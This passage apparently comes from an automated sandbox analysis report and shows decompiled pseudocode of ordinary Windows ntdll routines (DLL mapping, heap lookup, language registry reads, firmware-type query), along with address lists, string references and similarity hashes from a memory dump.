								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04A67D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04AC7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04A7A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04A4B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x04a57e4c
0x04a57e50
0x04a57e55
0x04a57e58
0x04a57e5d
0x04a57e71
0x04a57f33
0x04a57e77
0x04a57e77
0x04a57e79
0x04a57e79
0x04a57e7e
0x04a57f45
0x04aa9848
0x00000000
0x04aa9848
0x04a57f4e
0x04a57f53
0x04a57f5a
0x00000000
0x00000000
0x04aa985a
0x04aa9862
0x04aa9866
0x00000000
0x04aa986c
0x00000000
0x04aa986c
0x04a57e84
0x04a57e84
0x04a57e8d
0x04aa9871
0x04a57eb8
0x04a57ec0
0x04a57ec0
0x04a57e9a
0x04aa987e
0x00000000
0x00000000
0x04aa9884
0x04aa988b
0x04aa98a7
0x04aa98ac
0x04aa98b1
0x04aa98b6
0x04aa98b8
0x04aa98b8
0x04aa98b9
0x00000000
0x04aa98b9
0x04a57ea0
0x04a57ea7
0x00000000
0x00000000
0x04a57eac
0x04a57eb1
0x04a57ec6
0x04a57ed0
0x04aa98cc
0x04a57ed6
0x04a57ed6
0x04a57ed6
0x04a57ede
0x04a57ee3
0x04aa98e3
0x04aa98f0
0x04aa9902
0x04aa98f2
0x04aa98fb
0x04aa98fb
0x04aa9907
0x04aa991d
0x04aa991d
0x04aa9907
0x04aa98e3
0x04a57ef0
0x04a57f14
0x04a57f14
0x04a57f1e
0x04aa9946
0x04a57f24
0x04a57f24
0x04a57f24
0x04a57f2c
0x04aa996a
0x04aa9975
0x04aa9975
0x04aa997e
0x04aa9993
0x04aa9993
0x04aa997e
0x00000000
0x04a57ef2
0x04a57efc
0x04a57f0a
0x04a57f0e
0x04aa9933
0x00000000
0x04aa9933
0x00000000
0x04a57f0e
0x00000000
0x00000000
0x00000000
0x04a57eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 04AA9891
minkernel\ntdll\ldrmap.c, xrefs: 04AA98A2
LdrpCompleteMapModule, xrefs: 04AA9898

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: fc1a92e6edec73f9ee91ad4bd359d177570822fea4a47e647cc6e75a9b0f8f1f
Instruction ID: e7b1829fda9093d7743439e2b737c54ba141b07a1109f4f2b37000ec52a28a39
Opcode Fuzzy Hash: fc1a92e6edec73f9ee91ad4bd359d177570822fea4a47e647cc6e75a9b0f8f1f
Instruction Fuzzy Hash: 05510179A00745ABEB22CF68CA44B2AB7E8EF44718F040999EC55AB3E1D734FD00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04A4E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04A4E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04A4F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04A895D0();
						}
						if(_t78 != 0) {
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04A8FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04A8BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04A89600();
					if(_t97 < 0) {
						goto L6;
					}
					E04A8BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04A4F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04A8BB40(_t83, _t102 + 0x24, _t78);
								if(L04A543C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04A8BB40(_t84, _t102 + 0x24, _t94);
									if(L04A543C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x04a4e620
0x04a4e628
0x04a4e62f
0x04a4e631
0x04a4e635
0x04a4e637
0x04a4e63e
0x04aa5503
0x04aa5503
0x04a4e64c
0x04a4e64c
0x04a4e651
0x00000000
0x00000000
0x04a4e661
0x04a4e665
0x04aa542a
0x04a4e715
0x04a4e71a
0x04a4e71c
0x04a4e720
0x04a4e720
0x04a4e727
0x04a4e736
0x04a4e736
0x04a4e743
0x04a4e743
0x04a4e673
0x04a4e678
0x04a4e67d
0x04a4e682
0x04a4e685
0x04a4e692
0x04a4e69b
0x04a4e6a3
0x04a4e6ad
0x04a4e6b1
0x04a4e6b2
0x04a4e6bb
0x04a4e6bf
0x04a4e6c0
0x04a4e6c8
0x04a4e6cc
0x04a4e6d5
0x04a4e6d9
0x00000000
0x00000000
0x04a4e6e5
0x04a4e6ea
0x04a4e6f9
0x04a4e70b
0x04a4e70f
0x04aa5439
0x04aa545e
0x04aa545e
0x00000000
0x04aa545e
0x04aa543b
0x04aa543e
0x04aa5440
0x04aa5445
0x04aa5472
0x04aa5475
0x04aa548d
0x04aa5493
0x04aa54a9
0x00000000
0x00000000
0x04aa54ab
0x04aa54b4
0x04aa54bc
0x04aa54c8
0x04aa54de
0x04aa54fb
0x04aa54e0
0x04aa54e6
0x04aa54eb
0x04aa54eb
0x04aa54de
0x00000000
0x04aa54bc
0x04aa5477
0x04aa547a
0x04aa5480
0x04aa5483
0x04aa5486
0x04aa548b
0x00000000
0x00000000
0x00000000
0x04aa548b
0x00000000
0x00000000
0x00000000
0x00000000
0x04aa5447
0x04aa5447
0x04aa5447
0x04aa5447
0x04aa544e
0x00000000
0x00000000
0x04aa5450
0x04aa5452
0x04aa5455
0x04aa545a
0x00000000
0x00000000
0x00000000
0x04aa545c
0x04aa546a
0x04aa546d
0x04aa546f
0x00000000
0x04aa546f
0x04a4e70f

Strings

@, xrefs: 04A4E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04A4E68C
InstallLanguageFallback, xrefs: 04A4E6DB

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 9fc45e3ea5394352233665ef561f9668690c8988590288e789bfb5bca1eed9e1
Instruction ID: cc3260c4cfe9ae60e2fa8d6caec6e7596c526448016e89ec327c1cd8538332f4
Opcode Fuzzy Hash: 9fc45e3ea5394352233665ef561f9668690c8988590288e789bfb5bca1eed9e1
Instruction Fuzzy Hash: 6D51AFB2908355ABD714DF64C540AABB3E9BFC8724F05092EF985D7250F734EA04C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 04A6B8E4, Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04A6B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x4b38748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E04A4B150();
						} else {
							E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E04A4B150();
						__eflags =  *0x4b37bc8;
						if(__eflags == 0) {
							E04B02073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E04A6AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x04a6b8f0
0x04a6b8f2
0x04a6b8f4
0x04ab2c4e
0x04ab2c50
0x04ab2c56
0x04ab2c5c
0x04ab2c60
0x04ab2c7f
0x04ab2c84
0x04ab2c62
0x04ab2c77
0x04ab2c7c
0x04ab2c8a
0x04ab2c8f
0x04ab2c94
0x04ab2c9c
0x04ab2ca5
0x04ab2ca5
0x04ab2c9c
0x04ab2c50
0x04a6b8fa
0x04a6b902
0x04a6b921
0x04a6b921
0x04a6b924
0x04a6b924
0x04a6b927
0x00000000
0x00000000
0x04a6b929
0x04a6b92b
0x04a6b92d
0x04a6b940
0x00000000
0x04a6b940
0x04a6b932
0x04a6b932
0x00000000
0x04a6b932
0x00000000
0x04a6b904
0x04a6b904
0x04a6b90a
0x04a6b90c
0x04a6b916
0x04a6b919
0x04a6b915
0x04a6b915
0x04a6b91b
0x04a6b91b
0x00000000
0x04a6b910

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 04AB2C8A
HEAP: , xrefs: 04AB2C7F
HEAP[%wZ]: , xrefs: 04AB2C72

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: c3c48bc624b170e528a1ee31ccbb94407802063175ffe745ac55dcad3af96272
Instruction ID: ea27f52b055950e4a972c3d8719bc2999596ea9ffa22b7111b0623bf56296a6a
Opcode Fuzzy Hash: c3c48bc624b170e528a1ee31ccbb94407802063175ffe745ac55dcad3af96272
Instruction Fuzzy Hash: 7D11D3327151219FE728DF29C584B39B3B9EB80A25F14806AE04BCB252E730F840DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B0E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04B0E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E04B0BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E04B0BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E04B0AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04A89730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E04B0A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E04B0A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04A89730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E04B0A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E04B0A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04A62280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E04A5B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E04A5FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04A67D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E04AFFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x04b0e547
0x04b0e549
0x04b0e54f
0x04b0e553
0x04b0e557
0x04b0e55a
0x04b0e55c
0x04b0e55f
0x04b0e561
0x04b0e567
0x04b0e56b
0x04b0e7e2
0x00000000
0x04b0e571
0x04b0e575
0x04b0e577
0x04b0e57b
0x04b0e57c
0x04b0e57d
0x04b0e57e
0x04b0e57f
0x04b0e588
0x04b0e58f
0x04b0e591
0x04b0e592
0x04b0e592
0x04b0e596
0x04b0e59e
0x04b0e5a0
0x04b0e5a6
0x04b0e61d
0x04b0e61d
0x04b0e621
0x04b0e623
0x04b0e630
0x04b0e630
0x04b0e7e6
0x04b0e7eb
0x04b0e7ed
0x04b0e7f4
0x04b0e7fa
0x04b0e7ff
0x04b0e7ff
0x04b0e80a
0x04b0e812
0x04b0e812
0x04b0e5ab
0x04b0e5b4
0x04b0e5b9
0x04b0e5be
0x04b0e5c0
0x04b0e5c2
0x04b0e5c8
0x04b0e5c9
0x04b0e5cb
0x04b0e5cc
0x04b0e5d5
0x04b0e5e4
0x04b0e5f1
0x04b0e5f8
0x04b0e5f8
0x04b0e5d5
0x04b0e602
0x04b0e616
0x04b0e63d
0x04b0e644
0x04b0e64d
0x04b0e652
0x04b0e657
0x04b0e659
0x04b0e65b
0x04b0e661
0x04b0e662
0x04b0e664
0x04b0e665
0x04b0e66e
0x04b0e67d
0x04b0e68a
0x04b0e691
0x04b0e691
0x04b0e66e
0x04b0e6b0
0x00000000
0x04b0e6b6
0x04b0e6bd
0x04b0e6c7
0x04b0e6d7
0x04b0e6d9
0x04b0e6db
0x04b0e6de
0x04b0e6e3
0x04b0e6f3
0x04b0e6fc
0x04b0e700
0x04b0e700
0x04b0e704
0x04b0e70a
0x04b0e70a
0x04b0e713
0x04b0e716
0x04b0e719
0x04b0e720
0x04b0e761
0x04b0e76b
0x04b0e774
0x04b0e77a
0x04b0e77a
0x04b0e78a
0x04b0e791
0x04b0e799
0x04b0e79b
0x04b0e79f
0x04b0e7aa
0x04b0e7c0
0x04b0e7ac
0x04b0e7b2
0x04b0e7b9
0x04b0e7b9
0x04b0e7c7
0x04b0e806
0x00000000
0x04b0e7c9
0x04b0e7d1
0x04b0e7d8
0x00000000
0x04b0e7d8
0x00000000
0x00000000
0x04b0e722
0x04b0e72e
0x04b0e748
0x04b0e74c
0x04b0e754
0x04b0e756
0x04b0e75c
0x04b0e75c
0x00000000
0x04b0e75c
0x04b0e758
0x04b0e758
0x00000000
0x04b0e758
0x04b0e750
0x00000000
0x00000000
0x04b0e752
0x00000000
0x04b0e752
0x04b0e730
0x04b0e735
0x04b0e73d
0x04b0e73f
0x00000000
0x00000000
0x04b0e741
0x04b0e741
0x00000000
0x04b0e741
0x04b0e739
0x00000000
0x00000000
0x04b0e73b
0x00000000
0x04b0e73b
0x04b0e722
0x04b0e720
0x04b0e6b0
0x04b0e618
0x00000000
0x04b0e618

Strings

`, xrefs: 04B0E670
`, xrefs: 04B0E5D7

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: ee9c73e6aceb5921fdc98011a15de4cbb18dcd110b4512ce5a4db900b132ec96
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 679179712043419FE724CE65C940B2BBBE6EF88715F148D6DF9A58A2D0E774F904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04AC51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04AC51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4b205f0);
				E04A9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04AC53CA(0);
						return E04A9D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04A8F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04A63690(1, _t117, 0x4a21810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04A8AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04A64620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04A8AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04AC500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04A89860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x04ac51be
0x04ac51c3
0x04ac51c8
0x04ac51cd
0x04ac51d0
0x04ac51d3
0x04ac51d8
0x04ac51db
0x04ac51de
0x04ac51e0
0x04ac51e3
0x04ac51e6
0x04ac51e8
0x04ac5342
0x04ac5351
0x04ac5356
0x04ac535a
0x04ac5360
0x04ac5363
0x04ac5366
0x04ac5369
0x04ac5369
0x04ac536b
0x04ac536b
0x04ac5370
0x04ac53a3
0x04ac53a4
0x04ac53a6
0x04ac53ab
0x04ac53ab
0x04ac53ae
0x04ac53ae
0x04ac53b5
0x04ac53bf
0x04ac53bf
0x04ac5375
0x04ac5396
0x04ac53a0
0x04ac53a0
0x00000000
0x04ac5396
0x04ac5377
0x04ac5379
0x04ac537f
0x04ac538c
0x04ac5390
0x00000000
0x04ac5390
0x04ac51ee
0x04ac51f1
0x04ac5301
0x04ac5310
0x04ac5315
0x04ac5318
0x04ac531b
0x04ac5320
0x04ac532e
0x04ac5331
0x00000000
0x04ac5331
0x04ac5328
0x04ac5329
0x00000000
0x04ac5329
0x04ac51fa
0x04ac5235
0x04ac5236
0x04ac5239
0x04ac523f
0x04ac5240
0x04ac5241
0x04ac5242
0x04ac5246
0x04ac5247
0x04ac524e
0x04ac5251
0x04ac5267
0x04ac5269
0x04ac526e
0x04ac527d
0x04ac527e
0x04ac5281
0x04ac5282
0x04ac5287
0x04ac5288
0x04ac528a
0x04ac528f
0x04ac5294
0x00000000
0x00000000
